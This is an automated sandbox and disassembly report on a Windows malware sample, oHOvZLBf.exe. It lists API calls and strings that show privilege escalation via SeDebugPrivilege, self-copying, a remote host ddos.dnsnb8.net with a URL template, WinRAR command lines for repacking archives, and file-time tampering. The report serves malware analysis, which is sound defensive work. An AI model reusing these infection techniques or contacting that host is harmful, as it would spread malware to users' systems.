                              • Part of subcall function 00DF29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00DF2A6C
                              • Part of subcall function 00DF29E2: strrchr.MSVCRT ref: 00DF2A7C
                              • Part of subcall function 00DF29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00DF2A9F
                              • Part of subcall function 00DF29E2: lstrlen.KERNEL32(Documents and Settings), ref: 00DF2AAE
                              • Part of subcall function 00DF29E2: memset.MSVCRT ref: 00DF2AC6
                              • Part of subcall function 00DF29E2: memset.MSVCRT ref: 00DF2ADA
                              • Part of subcall function 00DF29E2: FindFirstFileA.KERNEL32(?,?), ref: 00DF2AEF
                              • Part of subcall function 00DF29E2: memset.MSVCRT ref: 00DF2B13
                            • strrchr.MSVCRT ref: 00DF2959
                            • lstrcmpiA.KERNEL32(00000001,exe), ref: 00DF2974
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                            • String ID: %s%s$%s\$C:\Users\user~1\AppData\Local\Temp\$exe$rar
                            • API String ID: 3004273771-4092107658
                            • Opcode ID: 3161fe496b38d62cede530f542e22a7add6dcaab7d6e08212ab90cd204f83ab5
                            • Instruction ID: b753eb4b5fcd9731f26f2f528c3197c378dc0f769c954dde303a0ad992cc76dc
                            • Opcode Fuzzy Hash: 3161fe496b38d62cede530f542e22a7add6dcaab7d6e08212ab90cd204f83ab5
                            • Instruction Fuzzy Hash: C231927198030C6BDB209BA4DC95FFA776C9B10314F078452F685E7581EAF4DAC48E70

                            Control-flow Graph

                            APIs
                            • GetTempPathA.KERNEL32(00000104,C:\Users\user~1\AppData\Local\Temp\,?,00000005,00000000), ref: 00DF164F
                            • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00DF165B
                            • GetModuleFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe,00000104), ref: 00DF166E
                            • CreateThread.KERNEL32(00000000,00000000,00DF1099,00000000,00000000,00000000), ref: 00DF16AC
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00DF16BD
                              • Part of subcall function 00DF139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe), ref: 00DF13BC
                              • Part of subcall function 00DF139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00DF13DA
                              • Part of subcall function 00DF139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00DF1448
                            • lstrcpy.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe), ref: 00DF16E5
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                            • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe$C:\Windows\system32$Documents and Settings
                            • API String ID: 123563730-3232464442
                            • Opcode ID: 7a8029c2d3e2b053ef55fc74baf4bc25a04f960d0aa21e4e7cd90c02830857a4
                            • Instruction ID: c5afea96d56dbaf4d191e371b8476917970949e0ad68c6fa994f38852757e374
                            • Opcode Fuzzy Hash: 7a8029c2d3e2b053ef55fc74baf4bc25a04f960d0aa21e4e7cd90c02830857a4
                            • Instruction Fuzzy Hash: CA118E75501318FBCF206BA5AD49EBB3E6DEB45365F07C012F309D52A0CA718984CBB1

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 205 df1000-df1023 CreateFileA 206 df1025-df1055 GetFileSize CreateFileMappingA MapViewOfFile 205->206 207 df1092-df1096 205->207 208 df107b-df1085 206->208 209 df1057-df105f 206->209 212 df108d-df1091 CloseHandle 208->212 213 df1087-df108b CloseHandle 208->213 210 df1074-df1075 UnmapViewOfFile 209->210 211 df1061-df106e call df17d0 209->211 210->208 211->210 212->207 213->212
                            APIs
                            • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00DF10E8,?), ref: 00DF1018
                            • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75A38400,?,http://%s:%d/%s/%s,00DF10E8,?), ref: 00DF1029
                            • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00DF1038
                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00DF10E8,?), ref: 00DF104B
                            • UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00DF10E8,?), ref: 00DF1075
                            • CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00DF10E8,?), ref: 00DF108B
                            • CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00DF10E8,?), ref: 00DF108E
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                            • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                            • API String ID: 1223616889-3273462101
                            • Opcode ID: 1617022a49a2ac9eddb0c6e501eb02d3bd8546d8342f4802784630cd5e01ed89
                            • Instruction ID: 55fee542f419d8356c16e76bf396a0a59d6d705b46b1c25d9a7335cfa6a45dcb
                            • Opcode Fuzzy Hash: 1617022a49a2ac9eddb0c6e501eb02d3bd8546d8342f4802784630cd5e01ed89
                            • Instruction Fuzzy Hash: BB011E7550035DBFE6306F609C88E3BBAACDB447A9F06862AB645E2190DA715E448A70

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 376 df2c48-df2c75 memset call df1973 379 df2c77-df2c7f 376->379 380 df2cb2-df2cb9 376->380 381 df2c8f-df2cac CreateThread WaitForMultipleObjects 379->381 382 df2c81-df2c8b 379->382 383 df2cbb-df2cc2 VirtualFree 380->383 384 df2cc8-df2ccc 380->384 381->380 382->381 383->384
                            APIs
                            • memset.MSVCRT ref: 00DF2C57
                              • Part of subcall function 00DF1973: PathFileExistsA.SHLWAPI(00DF4E5C,00000000,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe), ref: 00DF1992
                              • Part of subcall function 00DF1973: CreateFileA.KERNEL32(00DF4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00DF19BA
                              • Part of subcall function 00DF1973: Sleep.KERNEL32(00000064), ref: 00DF19C6
                              • Part of subcall function 00DF1973: wsprintfA.USER32 ref: 00DF19EC
                              • Part of subcall function 00DF1973: CopyFileA.KERNEL32(00DF4E5C,?,00000000), ref: 00DF1A00
                              • Part of subcall function 00DF1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF1A1E
                              • Part of subcall function 00DF1973: GetFileSize.KERNEL32(00DF4E5C,00000000), ref: 00DF1A2C
                              • Part of subcall function 00DF1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00DF1A46
                              • Part of subcall function 00DF1973: ReadFile.KERNEL32(00DF4E5C,00DF4E60,00000000,?,00000000), ref: 00DF1A65
                            • CreateThread.KERNEL32(00000000,00000000,00DF2B8C,00000000,00000000,00000000), ref: 00DF2C99
                            • WaitForMultipleObjects.KERNEL32(00000001,00DF16BA,00000001,000000FF,?,00DF16BA,00000000), ref: 00DF2CAC
                            • VirtualFree.KERNEL32(007E0000,00000000,00008000,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe,00DF4E5C,00DF4E60,?,00DF16BA,00000000), ref: 00DF2CC2
                            Strings
                            • C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe, xrefs: 00DF2C69
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                            • String ID: C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe
                            • API String ID: 2042498389-121788227
                            • Opcode ID: 559445e4b8c2620448a27545547e4a18e8d7cf958212ede8b77b523450764102
                            • Instruction ID: aa8a662f657be04368ae4a924dd2d6d315acda27098c18c1ac611bac5c81e5d4
                            • Opcode Fuzzy Hash: 559445e4b8c2620448a27545547e4a18e8d7cf958212ede8b77b523450764102
                            • Instruction Fuzzy Hash: 33018F726412287ED710ABA5EC0AEBF7E6CEF41B60F16C115BB15D62C1DAA09A04C7F0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 385 df14e1-df14fb 386 df14fd-df1510 GetModuleHandleA 385->386 387 df1541-df1547 385->387 388 df151a-df1535 VirtualQuery 386->388 389 df1512-df1518 386->389 390 df1549-df154c 387->390 391 df1573-df1574 call df1638 387->391 393 df153b 388->393 394 df1537-df1539 388->394 389->387 395 df154e-df1555 390->395 396 df1569-df1570 390->396 397 df1579-df157a ExitProcess 391->397 393->387 394->387 394->393 395->396 398 df1557-df1566 call df1af9 395->398 398->396
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000), ref: 00DF1504
                            • VirtualQuery.KERNEL32(00DF14E1,?,0000001C), ref: 00DF1525
                            • ExitProcess.KERNEL32 ref: 00DF157A
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: ExitHandleModuleProcessQueryVirtual
                            • String ID:
                            • API String ID: 3946701194-0
                            • Opcode ID: 972af4141e338d2baf2734ef1dc1777ceea9112f4a64d816ce6ec6adadc537c0
                            • Instruction ID: 8f39df088d56851f8c308432f1e8d317356fd44ce08023869f0d864bae7e1d78
                            • Opcode Fuzzy Hash: 972af4141e338d2baf2734ef1dc1777ceea9112f4a64d816ce6ec6adadc537c0
                            • Instruction Fuzzy Hash: EF117C79900318EFCB20DFA5AC94A7E77BCEB84750B1AC02BF602D2350D6308941DB70

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 401 df1915-df1922 402 df1928-df192c 401->402 403 df1924-df1926 401->403 405 df194f-df1952 402->405 406 df192e-df194d memset GetFileTime 402->406 404 df196e-df1970 403->404 405->404 408 df1954-df1960 SetFileTime 405->408 407 df1966-df1968 406->407 409 df196c 407->409 410 df196a 407->410 408->407 409->404 410->409
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: FileTimememset
                            • String ID:
                            • API String ID: 176422537-0
                            • Opcode ID: ed92504ecc87aa036ee996ce000da083a30a978b6214b14052dee1d0d574bd98
                            • Instruction ID: 4d45b15357fb8ea7236c749a8b4bfb9a990b7f00ede29f63e89ce3fc98c84d2a
                            • Opcode Fuzzy Hash: ed92504ecc87aa036ee996ce000da083a30a978b6214b14052dee1d0d574bd98
                            • Instruction Fuzzy Hash: 7DF0313620020DEBDB209E26DC04AB777ACAB50361F06C526F666D5190E770D645DEB0
                            APIs
                            • GetCurrentProcess.KERNEL32(C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe,?,?,?,?,?,?,00DF13EF), ref: 00DF11AB
                            • OpenProcessToken.ADVAPI32(00000000,00000028,00DF13EF,?,?,?,?,?,?,00DF13EF), ref: 00DF11BB
                            • AdjustTokenPrivileges.ADVAPI32(00DF13EF,00000000,?,00000010,00000000,00000000), ref: 00DF11EB
                            • CloseHandle.KERNEL32(00DF13EF), ref: 00DF11FA
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00DF13EF), ref: 00DF1203
                            Strings
                            • C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe, xrefs: 00DF11A5
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                            • String ID: C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe
                            • API String ID: 75692138-121788227
                            • Opcode ID: 5ed9602c1a535bfa254c69620f341372af40d737d9d154dcb4fac4c2734540fa
                            • Instruction ID: bf47ffc6657594e442624e661c21a3bcbb62bc624719cc461525718023cf776b
                            • Opcode Fuzzy Hash: 5ed9602c1a535bfa254c69620f341372af40d737d9d154dcb4fac4c2734540fa
                            • Instruction Fuzzy Hash: 0F01D2B5900309EFDB00DFE4C989AAEBBB8FB04305F11846AE606E2250DB719E44DB60
                            APIs
                            • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe), ref: 00DF13BC
                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00DF13DA
                            • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00DF1448
                              • Part of subcall function 00DF119F: GetCurrentProcess.KERNEL32(C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe,?,?,?,?,?,?,00DF13EF), ref: 00DF11AB
                              • Part of subcall function 00DF119F: OpenProcessToken.ADVAPI32(00000000,00000028,00DF13EF,?,?,?,?,?,?,00DF13EF), ref: 00DF11BB
                              • Part of subcall function 00DF119F: AdjustTokenPrivileges.ADVAPI32(00DF13EF,00000000,?,00000010,00000000,00000000), ref: 00DF11EB
                              • Part of subcall function 00DF119F: CloseHandle.KERNEL32(00DF13EF), ref: 00DF11FA
                              • Part of subcall function 00DF119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00DF13EF), ref: 00DF1203
                            Strings
                            • SeDebugPrivilege, xrefs: 00DF13D3
                            • C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe, xrefs: 00DF13A8
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                            • String ID: C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe$SeDebugPrivilege
                            • API String ID: 4123949106-3902145337
                            • Opcode ID: 8bb72bfe377b61078161a3ccf318eb6692e1fe07a222e0f489bfa2ea885e8025
                            • Instruction ID: 59c491d77da5195c8c8eaa2eb8e223d701f5fdffd09ded894364fec90ff46ab0
                            • Opcode Fuzzy Hash: 8bb72bfe377b61078161a3ccf318eb6692e1fe07a222e0f489bfa2ea885e8025
                            • Instruction Fuzzy Hash: 15311D79D4020DEAEF209BA58C45FFEBBB8EB85705F26C16AE604B2141D7709E45CB70
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                            • Instruction ID: ec5bce18b48b189c8f204dc6e5e737bec29a406fd75aa53f98c206d8f77353a6
                            • Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                            • Instruction Fuzzy Hash: 1D81A071204B458FC728CF28C8906AABBE2EFD5314F15C92DE1EA87B51D734E949CB64

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 414 df239d-df23d6 strstr 415 df23d8-df23e2 414->415 416 df2451-df247a CreateFileA GetFileSize 414->416 417 df23ed-df23f1 415->417 418 df2675-df2676 CloseHandle 416->418 419 df2480-df2483 416->419 421 df23e4-df23ec 417->421 422 df23f3-df241d 417->422 420 df267c-df2681 RemoveDirectoryA 418->420 419->418 423 df2489-df2493 419->423 424 df2687-df268f 420->424 421->417 422->416 425 df241f-df2425 422->425 423->418 426 df2499-df254b call df1915 CloseHandle memset strrchr wsprintfA strrchr memset * 2 wsprintfA Sleep call df189d 423->426 427 df243a-df2443 425->427 428 df2427-df2436 425->428 426->420 435 df2551-df2556 426->435 427->424 432 df2449 427->432 428->425 431 df2438 428->431 431->416 432->416 435->420 436 df255c-df261c Sleep memset wsprintfA call df29e2 memset wsprintfA Sleep call df189d Sleep CreateFileA call df1915 CloseHandle 435->436 436->420 443 df261e-df2626 436->443 443->420 444 df2628-df262c 443->444 445 df262e-df2632 444->445 446 df2634-df2640 444->446 447 df2641-df2665 SetFilePointer WriteFile 445->447 446->447 447->420 448 df2667-df2673 SetEndOfFile 447->448 448->420
                            APIs
                            • strstr.MSVCRT ref: 00DF23CC
                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00DF2464
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00DF2472
                            • CloseHandle.KERNEL32(?,00000000,00000000), ref: 00DF24A8
                            • memset.MSVCRT ref: 00DF24B9
                            • strrchr.MSVCRT ref: 00DF24C9
                            • wsprintfA.USER32 ref: 00DF24DE
                            • strrchr.MSVCRT ref: 00DF24ED
                            • memset.MSVCRT ref: 00DF24F2
                            • memset.MSVCRT ref: 00DF2505
                            • wsprintfA.USER32 ref: 00DF2524
                            • Sleep.KERNEL32(000007D0), ref: 00DF2535
                            • Sleep.KERNEL32(000007D0), ref: 00DF255D
                            • memset.MSVCRT ref: 00DF256E
                            • wsprintfA.USER32 ref: 00DF2585
                            • memset.MSVCRT ref: 00DF25A6
                            • wsprintfA.USER32 ref: 00DF25CA
                            • Sleep.KERNEL32(000007D0), ref: 00DF25D0
                            • Sleep.KERNEL32(000007D0,?,?), ref: 00DF25E5
                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00DF25FC
                            • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00DF2611
                            • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00DF2642
                            • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00DF265B
                            • SetEndOfFile.KERNEL32 ref: 00DF266D
                            • CloseHandle.KERNEL32(00000000), ref: 00DF2676
                            • RemoveDirectoryA.KERNEL32(?), ref: 00DF2681
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                            • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user~1\AppData\Local\Temp\
                            • API String ID: 2203340711-1252250577
                            • Opcode ID: 5eb73437fc1b675a924bccf9a3371dd6328778320d00a1e0bfaa203b8630d308
                            • Instruction ID: 52c4239ead26ce5a843b26d0d2d7b1818b87f5af075cac47add99e0327e0989c
                            • Opcode Fuzzy Hash: 5eb73437fc1b675a924bccf9a3371dd6328778320d00a1e0bfaa203b8630d308
                            • Instruction Fuzzy Hash: 76818EB1504348BBD7109F64EC49EBB77ACEB88704F06851AFB84D2290DB74DA49CB76
                            APIs
                            • memset.MSVCRT ref: 00DF2766
                            • memset.MSVCRT ref: 00DF2774
                            • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00DF2787
                            • wsprintfA.USER32 ref: 00DF27AB
                              • Part of subcall function 00DF185B: GetSystemTimeAsFileTime.KERNEL32(00DF1F92,00000000,?,00000000,?,?,?,00DF1F92,?,00000000,00000002), ref: 00DF1867
                              • Part of subcall function 00DF185B: srand.MSVCRT ref: 00DF1878
                              • Part of subcall function 00DF185B: rand.MSVCRT ref: 00DF1880
                              • Part of subcall function 00DF185B: srand.MSVCRT ref: 00DF1890
                              • Part of subcall function 00DF185B: rand.MSVCRT ref: 00DF1894
                            • wsprintfA.USER32 ref: 00DF27C6
                            • CopyFileA.KERNEL32(?,00DF4C80,00000000), ref: 00DF27D4
                            • wsprintfA.USER32 ref: 00DF27F4
                              • Part of subcall function 00DF1973: PathFileExistsA.SHLWAPI(00DF4E5C,00000000,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe), ref: 00DF1992
                              • Part of subcall function 00DF1973: CreateFileA.KERNEL32(00DF4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00DF19BA
                              • Part of subcall function 00DF1973: Sleep.KERNEL32(00000064), ref: 00DF19C6
                              • Part of subcall function 00DF1973: wsprintfA.USER32 ref: 00DF19EC
                              • Part of subcall function 00DF1973: CopyFileA.KERNEL32(00DF4E5C,?,00000000), ref: 00DF1A00
                              • Part of subcall function 00DF1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF1A1E
                              • Part of subcall function 00DF1973: GetFileSize.KERNEL32(00DF4E5C,00000000), ref: 00DF1A2C
                              • Part of subcall function 00DF1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00DF1A46
                              • Part of subcall function 00DF1973: ReadFile.KERNEL32(00DF4E5C,00DF4E60,00000000,?,00000000), ref: 00DF1A65
                            • DeleteFileA.KERNEL32(?,?,00DF4E54,00DF4E58), ref: 00DF281A
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00DF4E54,00DF4E58), ref: 00DF2832
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                            • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user~1\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                            • API String ID: 692489704-4282063453
                            • Opcode ID: 5558022cb85f7aab02c3b47b847c74cd9d7538c4eff30131c14a22e227b0518c
                            • Instruction ID: 873ab3d0e77153bf66f66ccdbeb24759963b7ea484565cc9b870f42c6ff55129
                            • Opcode Fuzzy Hash: 5558022cb85f7aab02c3b47b847c74cd9d7538c4eff30131c14a22e227b0518c
                            • Instruction Fuzzy Hash: CD2133B694031C7FDB10E7A49C89EFB776CDB04744F4685A1B754E2141E670DF488AB4
                            APIs
                              • Part of subcall function 00DF185B: GetSystemTimeAsFileTime.KERNEL32(00DF1F92,00000000,?,00000000,?,?,?,00DF1F92,?,00000000,00000002), ref: 00DF1867
                              • Part of subcall function 00DF185B: srand.MSVCRT ref: 00DF1878
                              • Part of subcall function 00DF185B: rand.MSVCRT ref: 00DF1880
                              • Part of subcall function 00DF185B: srand.MSVCRT ref: 00DF1890
                              • Part of subcall function 00DF185B: rand.MSVCRT ref: 00DF1894
                            • wsprintfA.USER32 ref: 00DF15AA
                            • wsprintfA.USER32 ref: 00DF15C6
                            • lstrlen.KERNEL32(?), ref: 00DF15D2
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00DF15EE
                            • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00DF1609
